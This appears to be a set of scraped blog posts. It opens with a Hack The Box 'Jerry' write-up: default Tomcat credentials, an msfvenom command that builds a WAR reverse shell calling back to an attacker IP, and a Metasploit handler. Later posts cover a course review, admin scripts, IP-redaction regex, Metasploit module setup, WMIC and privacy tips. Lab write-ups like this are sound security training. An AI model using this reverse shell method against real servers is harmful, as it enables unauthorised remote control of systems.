Hack the Box Jerry

Hack The Box – Jerry – Writeup

Jerry is a retired box from HTB so can only be done if you have a premium VIP account.

It shows the risks of leaving default credentials for installed services. The solution I’ve got here is fairly standard and I’ve kept in a little of extra in terms of thought processes which didn’t go anywhere instead of just writing out how to get the flags yourself.


First step is to run an Nmap scan of the target and note that it only comes back with one port, running Apache Tomcat version 7.0.88 and Coyote JSP Engine 1.1

1

As it looks like a web server, we can visit the site and confirm it looks like a base install of Apache Tomcat version 7.0.88

2

Only thing to notice from this generic Tomcat page is a file path name. This is worth noting in case we are trying to navigate around the file system at a later point in time.

3

Normally this might be the time to start running a tool like dirb or dirbuster to try and find what else is available on this server however some nice links are given to us in the top right as “Server Status” “Manager App” and “Host manager”. All 3 present us with a login box if we try to access them.

4

As this looks like a default install of Tomcat lets check to see if the default credentials have been changed. A quick Google search reveals a Github page with about 20 default passwords listed for tomcat installs. If there were more than 20 we Could use Hydra to automate trying them however as the passwords were short and simple enough you can work through them manually very quickly.

5

Doing this with the Server status module yields success for the login admin:admin

There isn’t much to see on this page, the only thing which stands out is an out of date java version which isn’t directly vulnerable now but worth noting for later if we get stuck.

6

Trying to log into the other modules now gives a HTTP 403 authorisation error instead of the password prompt from before. This is because the site is still trying to login with the admin:admin credential from earlier and while it registers as a valid set of credentials the admin account doesn’t have authorisation to access the other modules. There is no logout option on the site so you need to clear your browser history to reset.

7

A different set of  default credentials from Github is successful and we can get into the Manager app using tomcat:s3cret

There is plenty of interesting info on this page but the obvious place to start looking is the upload feature. Any functionality which gives us the ability to put our own files onto a remote server and execute them is a good candidate for further investigation.

8

If we can get a file onto the server which executes a reverse shell and connects back to us we can use that as a foothold to get further into the system. Lets use msfvenom to help create this reverse shell in a .war format as it is most likely going to be accepted by the uploader. We know the server is sending out http traffic so as a first choice we should look at using the http reverse shell. Any protocol not blocked by the firewall is likely to work for this.

9

We need to edit the options in the Meterpreter shell with the details of our local machine IP and port and give it a name of dodgyfile.war

msfvenom -p windows/x64/meterpreter_reverse_http LHOST=10.10.14.6 LPORT=4567 -f war -o dodgyfile.war

10

The .war file is going to have a .jsp file inside with a randomised name. This is in an effort to try to disguise it from virus scanners. It’s worth making a note of the name in case we need to manually visit it later. You can view the contents of the war file using any zip tool.

10.1

Now that we have the payload we should setup our machine to start listening in case the reverse shell gets activated as soon as we complete the upload.

Setup Metasploit as the listener by opening it up and using the exploit/multi/handler and giving it a few parameters

11

set the local host to your network interface (Look it up using ifconfig if needed). Set the port to whatever was set in the payload previously.

13

12

Start the listener using exploit -j  (-j puts the process into the background as soon as it starts)

14

Back on the target website lets try and upload our dodgy file. Fingers crossed there aren’t any extra security checks which might flag up the file. (unlikely, but we won’t know util we try)

15

Looks like it has uploaded fine, checking the Metasploit listener it hasn’t auto-ran so we need to find out how to get it started manually.

16

After a bit of clicking about and trying the features on the app manager page it looks like you can manually navigate to the .jsp we noted earlier to get it to execute.

17

As our listener was in the background waiting it caught the incoming connection and we can interact with it using:

sessions -i 1

18

To make things easier to navigate use the shell command and you can start enumeration and browsing for the required flags.

19

Slightly disappointing that there is no privilege escalation required for this box as you start your shell as the system account by default and can go straight into the administration account. The only small challenge left is to remember how to use quotes to see the contents of a text file with spaces in its name. Both flags are in the same text file.

20

 

Review of Udemy course – The RedTeam blueprint a unique guide to ethical hacking

Overview

RedTeam Nation - Brandon Dennis - Certificate of completion
RedTeam Nation – Brandon Dennis – Certificate of completion

The Redteam blue print is a video course created by Brandon Dennis which aims to take anyone with no previous security knowledge and give them a good starting point from which to pursue a career in cyber security.

The course covers all the topics you would expect as well as a multitude of others such as the typical structure of red and blue teams, advice for applying for jobs and tips for passing the interviews.

Most courses I’ve seen in the past briefly advise learners to find a programming language they are comfortable with and take a separate course to improve their knowledge however Brandons course includes 2:30 of Python tutorials and 1:40 in Assembly. While This is only enough to cover the topics briefly it is more than enough to get someone started with either language.

2

Brandon himself has completed the OSCP and is studying for the OSCE. it feels like his choice of topics and how deep he goes into each topic is aimed at someone who eventually wants to commit and study for the OSCP. The course would also be useful for someone looking at the Comptia Security+ or the EC-Council CEH.

Pros

  • Far more in depth than other courses I’ve seen which claim to go to beginner –> hacker
  • Plenty of demonstrations showing the concepts discussed.
  • The course covers far more than just the technical aspect of cyber security.
  • Lots of extra resources provided with the lectures such as templates or links for further reading:
    Extra resources attached to lectures
    Extra resources attached to lectures
  • All the standard stages of a red team assignment are covered: reconnaissance, enumeration, exploit, pivoting, privilege escalation, persistence, covering tracks.
  • The teachers voice is clear and easy to understand.

Cons

  • The screen capture was recorded at a high resolution and is sometimes only visible if you have a good steady internet connection which auto connects at 1080p, for some reason you cannot manually set it to anything higher than 720p which means if you are on a weak connection you cannot see what is happening on screen:High resolution - hard to see console
  • The module regarding job hunting and salary is very specific to the USA. This isn’t Brandons fault and I wouldn’t expect him to tailor-make videos for every country but is worth noting if you are somewhere where the IT job market is very different from America.

Verdict

Very indepth course and value for money if you buy it during a Udemy sale

Check the up/down status of servers and services with a batch file

Here is a template for a batch file you can run on demand to check the up/down status of servers and services using the command prompt.

Most companies will be using some sort of automated tool for monitoring the status of their servers however if you don’t have the budget or want something quick to use here is something you can setup which pings as many servers or services as you want and outputs their status to a text file which can quickly be scanned to find out if any have gone down unexpectedly.

Or maybe you pushed out a windows patch to all your machines and want to check everything has come back up after reboots?

Instructions:

  • Copy and Paste the below script into a text file and save it using any name but with a .bat extension
  • Place it in c:\X\       (if needed you can change this location in the script)
  • Edit the bat file and replace #SERVER and #SERVICENAME with whatever you are checking. The service name can be found in the properties 1
  • It should look like this:2
  • When you run the batch file it will output all the raw data into a file called servicestatus.txt then clean it up and place the final output into a file called FinalReport.txt which you can easily scan to see which servers either haven’t responded to ping or which services are showing as stopped.34

 

:

REM ———————–SECTION 1————————————–

REM This checker has 4 sections

REM Section 1 = Version details and notes

REM Section 2 = Pings a list of servers to ensure they are up

REM Section 3 = Contacts a list of services to ensure they are up

REM section 4 = Gets the raw output of sections 2+3 and removes unwanted lines, then outputs the results to finalreport.txt

REM ———————–SECTION 2————————————-

ping #SERVER1 >> c:/x/servicestatus.txt

ping #SERVER2 >> c:/x/servicestatus.txt

ping #SERVER3 >> c:/x/servicestatus.txt

REM ———————–SECTION 3—————————————-

sc \\#SERVER1 query #SERVICENAME >> c:/x/ServiceStatus.txt

sc \\#SERVER1 query #SERVICENAME >> c:/x/ServiceStatus.txt

sc \\#SERVER2 query #SERVICENAME >> c:/x/ServiceStatus.txt

sc \\#SERVER3 query #SERVICENAME >> c:/x/ServiceStatus.txt

sc \\#SERVER3 query #SERVICENAME >> c:/x/ServiceStatus.txt

REM ———————–SECTION 4———————————————–

findstr /v “statistics Packets Approximate Minimum TYPE WIN32 STOPPABLE SERVICE_EXIT_CODE CHECKPOINT WAIT_HINT” c:/x/servicestatus.txt > c:/x/FinalReport.txt

del “C:\X\servicestatus.txt” /f /q

Remove IP addresses from multiple log files

Log files can grow as large as you let them and if for any reason you need to redact the IP addresses they hold it’s often impractical to do it manually.

It can be automated using Notepad++ (A free text editor Notepad++ Download link) with some clever regex.

There are 2 different methods, one using simple regex which will do the job but will also remove some non-IP numbers which look similar in format to an IP address.

Quick and dirty method

Here are some demo log files with thousands of IP addresses inside:

regex1

Launch Notepad++ and select search >> find in files >>

regex2

The quick and dirty regex is : (\d{1,3}\.){3}\d{1,3}

set some replacement text or leave blank if you want to just delete the entries.

set the directory which contains your log files, and most importantly set the search mode to “regular expression”. It’s set to “Normal” by default.

regex3

When you press “Replace in Files” you’ll turn this:

regex4

Into :

regex6

As you can see it’s also gone through all of the log files and saved you a lot of manual time and effort:

regex5

Regex explained:

(\d{1,3}\.){3}\d{1,3}

(\d{1,3}\.) finds any set of numbers 1-3 digits in length with a full stop at the end.

{3} repeats the previous regex 3 times.

\d{1,3} is similar to the first part and searches for a set of numbers 1-3 digits in length but with no full stop at the end.

The reason you cannot simply use (\d{1,3}\.){4} is because the last octet of an IP address doesn’t end with a full stop.

The problem with this quick regex is that it will also pick up numbers such as:

999.999.999.999 which is not a valid IP. Depending on the contents of your log files this might not be a problem.

IP Specific regex

If the quick and dirty method doesn’t do exactly what you need you can use this much longer regex to specify the numbers which can appear in an IP address:

(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)

It will do mostly the same as the previous regex but is smart enough to not remove 999.999.999.999

regex8regex7regex9

How to add a custom module to Metasploit

Metasploit comes with thousands of modules preinstalled but there is nothing stopping you from adding some brand new ones from the internet or altering existing ones.

Here is the method for taking an existing exploit and adding your own custom version of it to Metasploit, the same instructions can be adapted for adding a brand new exploit from the internet.

  • By default in Kali the modules are all stored in /usr/share/metasploit-framework/modules it’s worth checking yours are here before we continue.

1

  1. Open up msfconsole and navigate to your modules folder2
  2. In this example we will be making a custom version of the ms02_056_hello.rb mssql exploit. Use the mkdir command to create a custom folder in a sensible location and copy the exploit into it using cp.3
  3. navigate to your custom folder and confirm the exploit copy is there:4
  4. Open up the exploit using any editor (Ignore this if you don’t intend on making any changes and have found a module from the internet:5
  5. Make the changes you want. In the screenshot below we have just changed the description to as a demonstration. Save your new exploit.6
  6. Use the mv command to give your exploit a custom name, this stops you accidentally confusing it with the original code in the future.7
  7. Metasploit won’t be able to find your exploit until it after you exit and reopen msfconsole. You’ll see a search error if you try: 8
  8. After closing and reopening msfconsole your code should be visible within Metasploit to use just like the preinstalled ones.9
Happy laptop serial number

Find Lenovo serial number using WMIC

 

It can be very annoying to try and find the serial number of your laptop only to realise its on a little sticker somewhere inaccessible, requiring you to hunt for a screwdriver to remove a panel, or forcing you to power down to remove the battery.

If you’ve had your machine for a while its possible the numbers on it have faded or the sticker has partly come off, forcing you to play a vague form of hangman to figure it out.

The serial number isn’t something most people care about, unless the laptop gets stolen or they are trying to check warranty online. Trying to find the serial after you’ve lost your laptop isn’t going to be too successful so its recommended to find it and make a note just in case.

If you do find yourself struggling to get the serial by looking at the sticker this might save you some frustration:

  1. open up an elevated command prompt
  2. Type “Wmic bios get serialnumber” and press enter

if the serial is registered in the BIOS it should get displayed on screen. I’ve tested the command successfully on various Lenovo laptops, and both HP and Dell desktops.

If you are on a network you can query the serial of a remote machine using:

  • wmic /node:NameOfRemoteMachine bios get serialnumber

If you don’t have the correct permissions to the other machine, or have mistyped the computers name you can expect to see this error:

WMIC error for no access or incorrect computer name
WMIC error for no access or incorrect computer name

If you get unlucky and the serial isn’t in the BIOS you’ll get this error and start swearing as you head back to Google to find another method:

wmic-error-2
WMIC error for no entry in BIOS

 

 

Hiding the author name in WordPress

Following on from the previous article about not making the admin account easy to spot we can apply the same train of thought to a WordPress blog. The majority of blogs on this site have a single author (this blog included). That means it’s safe to assume that the author of all the articles is the user who has admin rights to the blog.

WordPress used to force people to manually add code to the functions.php file, which is attached to every theme, however they must have noticed a lot of people doing it as they’ve now added a nifty toggle switch on the site which you can use to hide the author’s name. Heres how to find it:

  1. Once logged in to WordPress select “My Site” then “Customize”.
    Hiding the author name on blogposts
    Hiding the author name on blogposts

    2. Select “Content Options”.

    3. Untick the “Display author” box.

 

Display author checkbox

Your posts should now have a blank space where the author used to be shown:

no-author
Author info hidden

Little tips/tricks like these won’t stop any determined attacker, but remember. The longer someone has to spend getting access to somewhere, the more likely they are to give up before getting what they want.

 

ID tag - tagged photos

Untagging your tagged photos on Facebook, Instagram and Twitter

With the popularity of camera phones in recent years its very likely that anything you do on a night out with friends gets documented by someone else in either a photo or a video. Whilst your drunken dancing might be funny at the time and entertain all your friends it might not make you look like a good candidate for a job in the future (unless that job is a sloppy backup dancer).

If friends have uploaded the photos and tagged you in them it makes an interviewers life much easier when they search for your name to see what comes up.

The social sites don’t always make it obvious how to remove your tag from something so heres a how-to guide for Facebook, Instagram and Twitter.

How to Untag yourself from a photo on Facebook

  1. Log into Facebook and visit your activity log (little triangle in the top right corner).
    facebookactivitylog
    Facebook activity log

    2. Select “photos”, then browse the results and check any media you want to untag yourself from.

    how to untag yourself from facebook photos
    how to untag yourself from facebook photos

    3. Select “Report/Remove Tags”.

    4.Select “I want the photo untagged” and then”Untag photos”.

    Remove tag from facebook photo
    Remove tag from facebook photo

    How to untag yourself from an Instagram photo

Untagging yourself in Instagram is slightly more hassle as you need to be logged into the app on your phone or tablet, you cannot do it from their website.

  1. Open the app and go to your page by selecting the head and shoulders icon.
    instagram-iphone-untag-yourself-photo-1
    Instagram head and shoulders icon

    2. Select the clipboard in the top right.

    instagram-iphone-untag-yourself-photo-2
    Instagram clipboard Icon

    3. This should bring up a page with all the photos you have been tagged in, Browse through them and tap on the one you would like to remove yourself from.

    4.Select the 3 dots near the bottom of the photo.

    3 dots, instagram untag
    3 dots, instagram untag

    5. Select “photo options” and then “Hide from profile”.

Note: This doesnt remove the tag from the picture but it does remove it from your profile so people will have a harder time searching for it.

How to remove tagged photo from twitter

Now that twitter is about more than just 140 characters you might find yourself tagged in a tweeted photo. Praise goes to the twitter devs for making this one of the easiest sites to untag yourself from

  1. Log into your twitter account and navigate to the photo you are tagged in.
  2. Select the 3 dots at the bottom of the photo and select “Remove my tag from photo”.
    removetagfromtwitter
    Remove yourself from tagged twitter photo

    Note:This doesn’t remove the photo, it just removes your tag which makes it more difficult for people to find it associated with your account.